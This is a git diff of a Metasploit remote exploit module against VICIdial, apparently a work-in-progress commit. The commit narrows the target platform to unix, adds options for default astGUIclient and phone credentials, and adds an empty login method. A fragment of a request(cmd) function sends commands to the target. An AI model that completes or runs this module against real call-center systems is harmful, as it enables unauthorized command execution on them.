Add new options
parent
110daa6e96
commit
b9cb8e7930
|
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Oct 23 2013',
|
'DisclosureDate' => 'Oct 23 2013',
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'Platform' => ['linux','unix'],
|
'Platform' => ['unix'],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'DisableNops' => true
|
'DisableNops' => true
|
||||||
|
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Arch' => ARCH_CMD,
|
'Arch' => ARCH_CMD,
|
||||||
'Platform' => 'unix'
|
'Platform' => 'unix'
|
||||||
}
|
}
|
||||||
],
|
]
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0
|
'DefaultTarget' => 0
|
||||||
))
|
))
|
||||||
|
@ -57,10 +57,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('USERNAME', [true, 'VICIdial Username', 'VDCL']),
|
OptString.new('USERNAME', [true, 'VICIdial Username', 'VDCL']),
|
||||||
OptString.new('PASSWORD', [true, 'VICIdial Password', 'donotedit'])
|
OptString.new('PASSWORD', [true, 'VICIdial Password', 'donotedit']),
|
||||||
|
OptString.new('USER_ASTGUI', [true, 'astGUIcient User Login', 'test']),
|
||||||
|
OptString.new('PASS_ASTGUI', [true, 'astGUIcient User Password', 'test']),
|
||||||
|
OptString.new('PHONE_USER_ASTGUI', [true, 'astGUIcient Phone Login', 'test']),
|
||||||
|
OptString.new('PHONE_PASSWORD_ASTGUI', [true, 'astGUIcient Phone Password', 'test'])
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def login
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
def request(cmd)
|
def request(cmd)
|
||||||
begin
|
begin
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
|
|
Loading…
Reference in New Issue